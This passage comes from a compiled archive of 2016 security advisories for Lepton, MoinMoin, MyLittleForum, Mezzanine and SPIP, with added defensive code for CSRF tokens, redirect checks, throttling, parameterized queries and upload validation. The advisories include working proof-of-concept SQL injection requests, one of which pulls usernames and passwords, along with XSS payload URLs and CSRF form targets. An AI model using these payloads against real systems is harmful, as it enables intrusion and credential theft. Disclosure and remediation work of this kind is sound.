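// precedes them, and "a.php.png" is blocked too, because with AddHandler-style
// configuration Apache's mod_mime considers every extension of a name.
function allowlist_check(string $filename): bool
{
    $allow = ['png', 'jpg', 'jpeg', 'gif'];
    $parts = explode('.', strtolower(basename($filename)));
    if (count($parts) < 2 || $parts[0] === '') {   // no extension, or a dotfile
        return false;
    }
    array_shift($parts);
    foreach ($parts as $ext) {
        if (!in_array($ext, $allow, true)) {
            return false;
        }
    }
    return true;
}

// Constructed names in the shapes the advisories describe. Storing uploads
// under a server-generated name outside the web root is the usual second
// layer on top of any extension check.
$samples = ['logo.png', 'test.png.php5', 'shell.pht', '.htaccess', 'a.php.png'];
foreach ($samples as $name) {
    printf("%-14s denylist=%-5s first-ext=%-5s allowlist=%s\n", $name,
        denylist_check($name) ? 'pass' : 'block',
        first_extension_check($name) ? 'pass' : 'block',
        allowlist_check($name) ? 'pass' : 'block');
}
```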

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-Code-Execution-171.html
 

[FD] Lepton 2.2.2: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    LEPTON 2.2.2 stable
Fixed in:            2.3.0
Fixed Version Link:  http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website:      http://www.lepton-cms.org/
Vulnerability Type:  CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it
contains various low to medium impact issues. The functionality that operates
on files and folders is vulnerable to CSRF, which may lead to XSS; the logout
is vulnerable to open redirect; the built-in bruteforce protection can be
easily bypassed; and passwords are hashed with md5 and sent out via email in
plaintext.

3. Details

CSRF

CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P

Description: All actions on folders and files are missing CSRF protection.
Because of this, an attacker can delete, create, or rename folders and files.
An attacker could for example create .html files which would lead to an XSS
attack.

Proof of Concept:

Delete Folder:
<form action="http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?action=delete_folder" method="POST">

Create File:
<form action="http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?action=create_file" method="POST">
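A per-session synchronizer token gating the kind of state-changing handler named in this advisory (execute.php?action=delete_folder), in the Elefant CSRF advisory (/user/add) and in the FUDforum login CSRF advisory (index.php?t=login), as an added PHP example. It is none of those projects' code; the session and requests are constructed arrays standing in for $_SESSION and $_POST so the script runs stand-alone.

```php
<?php
// Added example, not Elefant's, FUDforum's or Lepton's code: a synchronizer
// token for state-changing POST handlers. $session and the request arrays are
// constructed stand-ins for $_SESSION and $_POST.

declare(strict_types=1);

function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// The token must come from the request body, never from a cookie: cookies are
// attached to forged cross-site requests too. hash_equals compares in
// constant time.
function csrf_valid(array $session, array $post): bool
{
    return isset($session['csrf_token'], $post['csrf_token'])
        && is_string($post['csrf_token'])
        && hash_equals($session['csrf_token'], $post['csrf_token']);
}

// The application's own form carries the token as a hidden field. The login
// form needs the same field (that is what login CSRF requires), so a session
// has to exist before login to hold the token.
function delete_folder_form(array &$session): string
{
    $t = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<form action="execute.php?action=delete_folder" method="POST">'
         . '<input type="hidden" name="csrf_token" value="' . $t . '">'
         . '<input name="path"><button>Delete</button></form>';
}

// Unprotected handler, as in the advisories: acts on the request alone.
function delete_folder(array $post): string
{
    return 'deleted ' . ($post['path'] ?? '');
}

// Protected handler: the same action, gated by method and token. A token does
// not help a handler that also accepts GET, so the method is checked as well.
function delete_folder_protected(array $session, array $post, string $method): string
{
    if ($method !== 'POST' || !csrf_valid($session, $post)) {
        return 'rejected: not a POST with a valid CSRF token';
    }
    return delete_folder($post);
}

$session = [];
echo delete_folder_form($session), "\n";

$legit  = ['path' => '/media/old', 'csrf_token' => $session['csrf_token']];
$forged = ['path' => '/media/old'];   // a cross-site form cannot read $session

echo delete_folder($forged), "\n";                               // deleted /media/old
echo delete_folder_protected($session, $forged, 'POST'), "\n";   // rejected
echo delete_folder_protected($session, $legit, 'POST'), "\n";    // deleted /media/old
```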

Open Redirect

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: The redirect parameter of the logout script is vulnerable to open
redirect.

Proof of Concept:

http://localhost/LEPTON_stable_2.2.2/upload/account/logout.php?redirect=http://google.com
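Validating a redirect target so it can only lead back into the application, covering both this logout redirect and the hex-encoded login referrer from the Jaws advisory above, as an added PHP example. It is not Jaws' or Lepton's code; SITE_HOST and the sample targets are constructed.

```php
<?php
// Added example, not Jaws' or Lepton's code: validating a post-login or
// post-logout redirect target. Jaws carries the target hex-encoded in the URL
// path and decodes it with hex2bin, Lepton takes a plain "redirect"
// parameter; both feed the same check here. SITE_HOST is a constructed value
// standing in for the application's host.

declare(strict_types=1);

const SITE_HOST = 'localhost';

// Returns a local path (plus query) to redirect to, or $fallback if the
// target would leave the site or uses a scheme other than http(s).
function safe_redirect(string $target, string $fallback = '/'): string
{
    $parts = parse_url($target);
    if ($parts === false) {
        return $fallback;
    }
    if (isset($parts['host'])) {
        // Absolute or protocol-relative URL: only our own host, only over
        // http(s). "//evil.example" parses with a host but no scheme.
        $schemeOk = isset($parts['scheme'])
            && in_array(strtolower($parts['scheme']), ['http', 'https'], true);
        if (!$schemeOk || strcasecmp($parts['host'], SITE_HOST) !== 0) {
            return $fallback;
        }
    } elseif (isset($parts['scheme'])) {
        return $fallback;                   // javascript:, data:, mailto:, ...
    }
    $path = $parts['path'] ?? '/';
    // Browsers read "/\evil.example" as "//evil.example"; parse_url does not.
    // Require exactly one leading slash not followed by another / or \.
    if (!preg_match('#^/(?![/\\\\])#', $path)) {
        return $fallback;
    }
    return $path . (isset($parts['query']) ? '?' . $parts['query'] : '');
}

// Jaws-style referrer segment: .../users/login/referrer/<hex>.html
function referrer_from_hex(string $segment): string
{
    $hex = preg_replace('/\.html$/', '', $segment) ?? '';
    if ($hex === '' || strlen($hex) % 2 !== 0 || !ctype_xdigit($hex)) {
        return '';
    }
    return (string) hex2bin($hex);
}

// Constructed samples: the two PoC values from the advisories plus the usual
// shapes a redirect validator has to handle.
$samples = [
    referrer_from_hex('687474703a2f2f6578616d706c652e636f6d.html'),  // http://example.com
    'http://google.com',
    '//evil.example/',
    '/\\evil.example',
    'javascript:alert(1)',
    'http://localhost/admin/',
    '/users/profile?tab=settings',
];
foreach ($samples as $s) {
    printf("%-36s -> %s\n", $s, safe_redirect($s));
}
```

Only the last two samples come back as anything other than the fallback "/".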

Insufficient Bruteforce Protection

Description: The bruteforce protection works on a per-session basis, which is
easily bypassed by an attacker by simply requesting a new session, i.e. by not
sending the current, locked session information. The current bruteforce
protection may provide a false sense of security and should thus be removed or
changed.

Code:

if($_SESSION['ATTEMPS'] > $this->max_attemps) { $this->warn(); }

Password Handling

The password reset functionality sends a newly generated password in plaintext
via email, which is not recommended.

Additionally, md5 is used for hashing, which is also not recommended.
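The counter from the "Code:" snippet above keyed on the account and kept server-side instead of in $_SESSION, with password_hash() in place of md5 as the "Password Handling" section asks, as an added PHP example that is not Lepton's code. The store is an in-memory array so the script runs stand-alone; in a deployment it would be a database table or a cache shared by all requests.

```php
<?php
// Added example, not Lepton's code: a login throttle keyed on the account
// rather than on $_SESSION, plus password_hash()/password_verify() instead
// of md5. The store is an in-memory array standing in for a shared table.

declare(strict_types=1);

final class LoginThrottle
{
    /** @var array<string, array{count: int, first: int}> failures per account */
    private array $store = [];
    private int $maxAttempts;
    private int $windowSeconds;

    public function __construct(int $maxAttempts, int $windowSeconds)
    {
        $this->maxAttempts = $maxAttempts;
        $this->windowSeconds = $windowSeconds;
    }

    // A client that drops its session cookie gets a fresh $_SESSION but still
    // hits the same key here. (Keying on the account alone lets an attacker
    // lock a user out; pairing it with the source address is the usual
    // trade-off and is left out for brevity.)
    private function key(string $username): string
    {
        return strtolower(trim($username));
    }

    public function isLocked(string $username, int $now): bool
    {
        $k = $this->key($username);
        if (!isset($this->store[$k])) {
            return false;
        }
        if ($now - $this->store[$k]['first'] >= $this->windowSeconds) {
            unset($this->store[$k]);          // window expired, start over
            return false;
        }
        return $this->store[$k]['count'] >= $this->maxAttempts;
    }

    public function recordFailure(string $username, int $now): void
    {
        $k = $this->key($username);
        if (!isset($this->store[$k]) || $now - $this->store[$k]['first'] >= $this->windowSeconds) {
            $this->store[$k] = ['count' => 0, 'first' => $now];
        }
        $this->store[$k]['count']++;
    }

    public function recordSuccess(string $username): void
    {
        unset($this->store[$this->key($username)]);
    }
}

// Constructed user table: one account, password stored with password_hash().
$users = ['admin' => password_hash('correct horse battery staple', PASSWORD_DEFAULT)];

function attempt(LoginThrottle $t, array $users, string $user, string $pass, int $now): string
{
    if ($t->isLocked($user, $now)) {
        return 'locked';                    // refuse before touching the password
    }
    if (isset($users[$user]) && password_verify($pass, $users[$user])) {
        $t->recordSuccess($user);
        return 'ok';
    }
    $t->recordFailure($user, $now);
    return 'denied';
}

$throttle = new LoginThrottle(5, 900);
$now = 1700000000;

// Seven guesses, each as if from a brand-new session: denied x5, then locked.
for ($i = 1; $i <= 7; $i++) {
    echo "attempt $i: ", attempt($throttle, $users, 'admin', "guess$i", $now + $i), "\n";
}
// The right password is refused while the lock holds ...
echo "correct password while locked: ",
     attempt($throttle, $users, 'admin', 'correct horse battery staple', $now + 8), "\n";
// ... and accepted once the 900 s window has passed.
echo "correct password after window: ",
     attempt($throttle, $users, 'admin', 'correct horse battery staple', $now + 1000), "\n";
```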

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-CSRF-Open-Redirect-Insecure-Bruteforce-Protection-amp-Password-Handling-172.html
 

[FD] Lepton 2.2.2: SQL Injection

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    LEPTON 2.2.2 stable
Fixed in:            2.3.0
Fixed Version Link:  http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Vendor Website:      http://www.lepton-cms.org/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it is
vulnerable to multiple SQL injections. The injections require a user account
with elevated privileges.

3. Details

SQL Injection: Search Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "terms" parameter of the page search is vulnerable to SQL
Injection. A user account with the right "Pages" is required to access this
feature.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken=3f7020b05ec343675b6b2z1472137594 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 154

search_scope=title&terms=" union select username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from lep_users -- -&search=Search

Blind or Error-based SQL Injection: Create Page

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "parent" parameter of the create page functionality is
vulnerable to SQL Injection. A user account with the right "Pages" is required
to access this feature. The injection is blind or error based in the case that
PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken=dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

title=test&type=wysiwyg&parent=0 union select version()&visibility=public&submit=Add

Blind or Error-based SQL Injection: Add Droplet

CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description: The "Add_droplets" parameter of the droplet permission manager is
vulnerable to SQL injection. A user account with access to the Droplets
administration tool is required. The injection is blind or error based in the
case that PHP is configured to show errors.

Proof of Concept:

POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets&leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1
Host: localhost
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 277

tool=droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute='Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1&Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1&Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save
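Added example (not Lepton's code) serving the three injections above: a Python/sqlite3 sketch over a constructed lep_pages/lep_users schema that puts the string-concatenated search the "terms" payload exploits next to a bound-parameter version, plus a digits-only check for numeric fields such as "parent" and the droplet permission ids. Table and column names are assumptions made for the example.

```python
import sqlite3

# Constructed in-memory schema standing in for Lepton's lep_pages / lep_users
# tables (column names are assumptions); not the project's code.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE lep_pages(page_id INTEGER, page_title TEXT);
        CREATE TABLE lep_users(username TEXT, password TEXT);
        INSERT INTO lep_pages VALUES (1, 'Home'), (2, 'About');
        INSERT INTO lep_users VALUES ('admin', 'constructed-hash-value');
    """)
    return db


def search_vulnerable(db, terms):
    # The search term is spliced into the SQL text, so a closing quote turns
    # the rest of the input into SQL: the "terms" pattern from the advisory.
    sql = ("SELECT page_id, page_title FROM lep_pages "
           "WHERE page_title LIKE '%" + terms + "%'")
    return db.execute(sql).fetchall()


def search_safe(db, terms):
    # Bound parameter: the engine receives the value separately from the
    # statement text, so no input can change the query's structure.
    sql = "SELECT page_id, page_title FROM lep_pages WHERE page_title LIKE ?"
    return db.execute(sql, ("%" + terms + "%",)).fetchall()


def parent_id(raw):
    """For numeric fields such as "parent", accept digits only and convert
    once, before the value gets anywhere near a query."""
    if not raw.isdigit():
        raise ValueError("parent must be a non-negative integer")
    return int(raw)


def parent_id_or_none(raw):
    try:
        return parent_id(raw)
    except ValueError:
        return None
```

Binding works for values; it does not work for identifiers or clauses, which is why the integer fields get their own validation step rather than a parameter.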

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-SQL-Injection-173.html
 

[FD] MoinMoin 1.9.8: XSS

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MoinMoin 1.9.8
Fixed in:            1.9.9
Fixed Version Link:  http://static.moinmo.in/files/moin-1.9.9.tar.gz
Vendor Website:      https://moinmo.in
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 CVE-2016-7148, CVE-2016-7146
Credits:             Tim Coen of Curesec GmbH

2. Overview

MoinMoin is an open source wiki application written in Python. In version
1.9.8, it is vulnerable to two persistent XSS issues. This allows an attacker
to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Persistent XSS (CVE-2016-7148)

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: A page name is echoed in the attach file page without encoding,
leading to persistent XSS.

Proof of Concept:

To place the payload, create a new page whose name contains the payload by
visiting:

http://localhost:9090/newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=edit

To trigger the payload, visit the attach file page:

http://localhost:9090/newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=AttachFile

Note that there must be at least one existing attachment.

XSS 2: Persistent XSS (CVE-2016-7146)

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: The GUI editor is vulnerable to XSS via a specifically crafted
URL, as it echoes part of the URL without encoding in two different places. The
issue can be exploited in a reflected as well as in a persistent way.

Proof of Concept:

Reflected example (the page does not have to exist):

http://localhost:9090/'">?action=fckdialog&dialog=attachment

Alternatively, an attacker can create a page containing the payload:

http://localhost:9090/newtestfoo'%22%3E%3Cimg%20src=no%20onerror=alert(1)%3E

The payload is triggered when attaching a file via the GUI editor
("Edit (GUI)" -> "Attachment").

4. Solution

To mitigate this issue please upgrade at least to version 1.9.9:

http://static.moinmo.in/files/moin-1.9.9.tar.gz

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Contacted Vendor, Vendor confirmed, Requested CVEs
09/06/2016 CVEs assigned and distributed to vendor
10/05/2016 Vendor requests more time
10/31/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/MoinMoin-198-XSS-175.html
 

[FD] MyLittleForum 2.3.6.1: CSRF

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    MyLittleForum 2.3.6.1
Fixed in:            2.3.7beta
Fixed Version Link:  https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta
Vendor Website:      http://mylittleforum.net/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is
vulnerable to cross site request forgery. An attacker could exploit this issue
to add new users or change the status of existing users to administrator if a
victim visits a website containing a specifically crafted payload while logged
into MyLittleForum.

3. Details

CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description: There is no CSRF protection, allowing an attacker to perform
actions for a victim if the victim visits an attacker controlled website while
logged in.

Proof of Concept:

Add New User:
[HTML form posting to http://localhost/mylittleforum-2.3.6.1/index.php with method="POST"; the form fields did not survive the archive]

Make Existing User Admin:
[HTML form; the markup did not survive the archive]
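Added example (not MyLittleForum's code): a Python sketch of per-session CSRF tokens with a constant-time check, applied to the add-user action the advisory describes. The session, the submitted form and the site origin are constructed stand-ins.

```python
import hmac
import secrets

# Constructed stand-ins for the server-side session and the submitted form;
# not MyLittleForum's code. The canonical origin of the forum is assumed.
SITE_ORIGIN = "https://forum.example"


def issue_csrf_token(session):
    """One unguessable token per session, rendered into every state-changing form."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def check_csrf(session, form, origin=None):
    """Reject unless the form carries the session's token. A page on another
    site cannot read the victim's token, so a forged form never has it. The
    Origin header, when the browser sends one, is checked as a second line."""
    expected = session.get("csrf_token", "")
    submitted = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, submitted):
        return False
    if origin is not None and origin != SITE_ORIGIN:
        return False
    return True


def add_user(session, form, users, origin=None):
    """The state-changing action from the advisory, guarded by the token check.
    Returns True only when the user was actually created."""
    if not check_csrf(session, form, origin):
        return False
    users[form["user_name"]] = {"is_admin": form.get("user_type") == "admin"}
    return True
```

The same check guards the "make existing user admin" action; any handler that changes state runs it before touching the database.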

4. Solution

To mitigate this issue please upgrade at least to version 2.3.7beta:

https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta

Please note that a newer version might already be available.

5. Report Timeline

09/05/2015 Informed Vendor about Issue (no reply)
09/15/2015 Reminded Vendor of Disclosure Date
09/15/2015 Vendor replies
10/04/2015 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/MyLittleForum-2361-CSRF-176.html
 

[FD] Mezzanine 4.2.0: XSS

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    Mezzanine 4.2.0
Fixed in:            4.2.1
Fixed Version Link:  https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1
Vendor Website:      http://mezzanine.jupo.org/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

Mezzanine is an open source CMS written in Python. In version 4.2.0, it is
vulnerable to two persistent XSS attacks, one of which requires extended
privileges while the other does not. These issues allow an attacker to steal
cookies, inject JavaScript keyloggers, or bypass CSRF protection.

3. Details

XSS 1: Persistent XSS via Name in Comments

CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N

Description: When leaving a comment on a blog post, the author name is echoed
unencoded in the backend, leading to persistent XSS.

Proof of Concept:

Leave a comment and use the following as the author name: '">
[the rest of the payload did not survive the archive]

To trigger the payload, view the comment overview in the admin backend:
http://localhost:8000/admin/generic/threadedcomment
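Added example (not MoinMoin's or Mezzanine's code) for the two unencoded-echo issues, the MoinMoin page name earlier on this page and the Mezzanine author name here: output is encoded per context, percent-encoding for the URL path segment and HTML escaping for text and attribute values. The MoinMoin page-name payload is the test input; the markup shapes are constructed for the example.

```python
import html
from urllib.parse import quote

# The page-name payload from the MoinMoin proof of concept, used as test input.
PAYLOAD = "newtest'\"><img src=no onerror=alert(7)>"


def attach_file_link(pagename):
    """Link to a page's attachment view. The page name lands in two contexts
    and each gets its own encoder: percent-encoding for the URL path segment,
    HTML escaping for the href attribute value and for the link text."""
    href = "/%s?action=AttachFile" % quote(pagename, safe="")
    return '<a href="%s">%s</a>' % (html.escape(href, quote=True),
                                    html.escape(pagename, quote=True))


def comment_author_cell(author):
    """Author name in the admin comment list, as attribute value and as text."""
    safe = html.escape(author, quote=True)
    return '<td data-author="%s">%s</td>' % (safe, safe)


def comment_author_cell_vulnerable(author):
    # The pattern both advisories describe: user input pasted straight into markup.
    return '<td data-author="%s">%s</td>' % (author, author)


def has_raw_tag(markup, tag="img"):
    """Crude check a test can use: does a literal <tag appear in the output?"""
    return ("<" + tag) in markup.lower()
```

Escaping at output time, per context, is what a template engine's auto-escaping does; the bug in both products is a code path that bypassed it.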

XSS 2: Persistent XSS via HTML file upload

CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N

Description: When uploading files via the media manager, the extension .html is
allowed, leading to XSS via file upload. An account with the permissions to
upload files to the media manager is required.

Proof of Concept:

Visit the media manager and upload a .html file:
http://localhost:8000/admin/media-library/upload/?ot=desc&o=date

As uploaded files are stored inside the web root, the file can now be accessed
directly, thus executing the JavaScript code it contains:
http://localhost:8000/static/media/uploads/xss.html
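Added example (not Mezzanine's code): a Python upload check with an extension allowlist, a content-magic check, and the headers to serve stored files with, so a .html upload is refused and an image cannot be reinterpreted as HTML by the browser. The allowlist and header policy are constructed for the example.

```python
import os

# Allowlisted extensions with the leading bytes ("magic") each must start with.
# Constructed policy for this example; not Mezzanine's configuration.
ALLOWED = {
    "png":  b"\x89PNG\r\n\x1a\n",
    "gif":  b"GIF8",
    "jpg":  b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "pdf":  b"%PDF-",
}
CONTENT_TYPES = {"png": "image/png", "gif": "image/gif",
                 "jpg": "image/jpeg", "jpeg": "image/jpeg",
                 "pdf": "application/pdf"}


class UploadRejected(ValueError):
    pass


def validate_upload(filename, data):
    """Return the name to store, or raise. Only the final extension counts,
    it must be on the allowlist, and the content must match it; .html never
    gets through, whatever the rest of the name looks like."""
    base = os.path.basename(filename.replace("\\", "/"))
    if "." not in base:
        raise UploadRejected("missing extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected("extension not allowed: ." + ext)
    if not data.startswith(ALLOWED[ext]):
        raise UploadRejected("content does not look like a ." + ext + " file")
    return base


def is_rejected(filename, data):
    try:
        validate_upload(filename, data)
    except UploadRejected:
        return True
    return False


def serving_headers(stored_name):
    """Headers for handing an upload back. The content type comes from the
    vetted extension, and nosniff stops browsers from second-guessing it as
    text/html even if markup is buried inside an image."""
    ext = stored_name.rsplit(".", 1)[1].lower()
    disposition = "attachment" if ext == "pdf" else "inline"
    return {
        "Content-Type": CONTENT_TYPES[ext],
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": '%s; filename="%s"' % (disposition, stored_name),
    }
```

Storing uploads outside the web root, or serving them from a separate origin, removes the remaining risk that a served file runs script in the application's origin.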

4. Solution

To mitigate this issue please upgrade at least to version 4.2.1:

https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/05/2016 Vendor replies
09/19/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Mezzanine-420-XSS-177.html
 

[FD] SPIP 3.1: XSS & Host Header Injection

2016-11-18 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    SPIP 3.1
Fixed in:            3.1.2 / 3.0.23
Fixed Version Link:  http://www.spip.net/en_download
Vendor Website:      http://www.spip.net/
Vulnerability Type:  Reflected & Persistent XSS, Host Header Injection, httpOnly Cookie disclosure
Remote Exploitable:  Yes
Reported to vendor:  09/05/2016
Disclosed to public: 11/10/2016
Release mode:        Coordinated Release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Overview

SPIP is a content management system written in PHP. In version 3.1, it is
vulnerable to a persistent as well as a reflected cross site scripting
vulnerability, as it allows users to enter URLs containing the JavaScript
protocol, which an attacker can exploit to steal cookies, inject JavaScript
keyloggers, or bypass CSRF protection. Additionally, it contains a Host Header
Injection which may lead to the leakage of password reset tokens and thus the
compromise of user accounts. Finally, the application discloses httpOnly
cookies, making exploitation of XSS issues slightly easier.

3. Details

Persistent XSS

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description: When posting a message in the internal Forum, user input is
properly encoded, thus disallowing XSS. However, a hypertext link may be added
as well, and there is no check on the protocol of the supplied link, which
leads to an XSS vulnerability.

Proof of Concept:

1. Create a new message: http://localhost/spip/ecrire/?exec=forum&repondre=new
2. In the URL field enter: javascript:alert(1)
3. Post the message

To trigger the payload, a click on the link is required.

Reflected XSS

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description: When editing a private message, a redirect parameter may be
submitted as well. This parameter decides to what page a user is returned if
they were to press the back button. The value of this parameter is user
controlled and may thus be used for phishing or XSS attacks.

Proof of Concept:

Visit: http://localhost/spip/ecrire/?exec=message_edit&new=oui&to=2&redirect=javascript:alert(1)

Click on the Back button, represented by the envelope icon.
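Added example (not SPIP's code) serving both the forum link field and the redirect parameter above: a Python validator that accepts only allowlisted URL schemes or site-relative paths, so a javascript: URL, including spellings padded with control characters, never reaches an href or a redirect. The scheme allowlist and fallback values are choices made for the example.

```python
from urllib.parse import urlsplit

SAFE_LINK_SCHEMES = {"http", "https", "mailto"}


def _normalise(raw):
    # Drop control characters and embedded whitespace: browsers ignore them
    # inside a scheme, so "java\tscript:" would otherwise slip past a naive check.
    return "".join(ch for ch in raw.strip() if ch.isprintable() and not ch.isspace())


def _site_relative(url):
    # "/path" is fine; "//host" and "/\host" are scheme-relative and leave the site.
    return url.startswith("/") and not url.startswith("//") and not url.startswith("/\\")


def safe_link_target(raw, fallback="#"):
    """User-supplied hyperlink (the forum message URL field). Allowed: absolute
    URLs whose scheme is on the allowlist, or site-relative paths. Everything
    else, javascript:, data:, vbscript: and scheme-relative //host included,
    becomes the fallback. Checking the scheme against an allowlist beats
    blocklisting the string "javascript"."""
    url = _normalise(raw)
    try:
        parts = urlsplit(url)
    except ValueError:
        return fallback
    if parts.scheme:
        return url if parts.scheme.lower() in SAFE_LINK_SCHEMES else fallback
    return url if _site_relative(url) else fallback


def safe_redirect_target(raw, fallback="/"):
    """The 'where to go back to' parameter: stricter still, same-site paths only."""
    url = _normalise(raw)
    return url if _site_relative(url) else fallback
```

The forum link also needs HTML attribute escaping when it is written into the href; the scheme check here decides whether the value may be used at all.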

Host Header Injection

CVSS: Low 2.6 AV:N/AC:H/Au:N/C:P/I:N/A:N

Description:
The application takes the Host header and uses it in the password reset email.
As the Host header is user-controlled, an attacker can set it to arbitrary
values.

In the case of a password reset page, this leads to a security issue: an
